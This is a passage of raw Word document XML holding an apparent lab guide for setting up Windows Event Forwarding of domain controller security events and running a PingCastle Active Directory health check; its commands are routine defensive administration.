        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t>StartupType</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="144F153A" w:rsidP="082FBA6D" w:rsidRDefault="144F153A" w14:paraId="347966EA" w14:textId="77D2FD4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start-Service </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t>Wecsvc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="54B626D2" w14:textId="7CAD79E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create an Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="767CA2BF" w14:textId="173438DD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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Event Viewer</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subscriptions</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab (create if prompted).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="356A8A97" w14:textId="4B7F2E39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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create Subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="5F448DF7" w14:textId="1E3CFECA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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configure Subscription Settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="065CB3BF" w14:textId="384A3C81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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DomainControllerSecurityEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="4850D57B" w14:textId="22D955C0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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Collector Initiated: </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uncheck</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (we use source-initiated).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="43FD77F0" w14:textId="30FCE164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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Source Computers: Add DC(s) manually </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="56FBC10F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="56FBC10F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nebuchadnezzar</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) or use a </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security group</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="26EC80EB" w14:textId="70F8A6F7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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select Events to Collect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="284E67F0" w14:textId="59666BA9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082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Choose</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="4BAA541B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="3B22FB4C" w14:textId="785C77BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Filter by Event IDs like:</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4624</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4625</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4672</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4720</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4728</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4768</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="38B48DA8" w14:textId="5E67DACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Or collect </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all Security events</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in lab environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="378DEE9B" w14:textId="1BCE0355">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Save and Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="34B58DB1" w14:textId="473A8C87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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs will arrive in </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forwarded Events</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> log on the collector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68AD4DA3" w:rsidP="082FBA6D" w:rsidRDefault="68AD4DA3" w14:paraId="4FC62442" w14:textId="67EB0880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82FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eventvwr.msc</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="68AD4DA3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Forwarded Events → Verify delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="082FBA6D" w:rsidP="082FBA6D" w:rsidRDefault="082FBA6D" w14:paraId="4B4AE327" w14:textId="743D6380">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4AFFFC4A" w:rsidP="082FBA6D" w:rsidRDefault="4AFFFC4A" w14:paraId="41F63FCD" w14:textId="1DE78A19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1080" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="4AFFFC4A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger GPO Processing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4AFFFC4A" w:rsidP="082FBA6D" w:rsidRDefault="4AFFFC4A" w14:paraId="0B0DDD41" w14:textId="4089C1A3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="4AFFFC4A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gpupdate</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="4AFFFC4A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 xml:space="preserve"> /force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="082FBA6D" w:rsidP="082FBA6D" w:rsidRDefault="082FBA6D" w14:paraId="7EB570AB" w14:textId="088659A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="082FBA6D" w:rsidP="082FBA6D" w:rsidRDefault="082FBA6D" w14:paraId="3B1D4AE9" w14:textId="2B804C7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="5F16F83B" w14:paraId="1CD599B9" w14:textId="068EA973">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PingCastle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="18A779E7" w14:paraId="30F3BCDA" w14:textId="5F3D31DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="2DE7BD48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run a Health Check Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="48E86503" w14:textId="4428A767">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Command Prompt or PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="55592017">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>PingCastle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="6A1B9E6F" w14:textId="6C27838F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>cd C:\Tools\PingCastle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="00A9485B" w14:textId="0C141419">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Run the health check:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="13FE03DD" w14:textId="3FF85FE8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.\PingCastle.exe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>healthcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="2764BA88" w14:textId="4FB903C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Optionally specify a DC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="5E32FDE1" w14:textId="2856CFA6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.\PingCastle.exe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>healthcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> --server &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>FQDN_of_DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="3C80B6E5" w14:textId="64C8E54E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
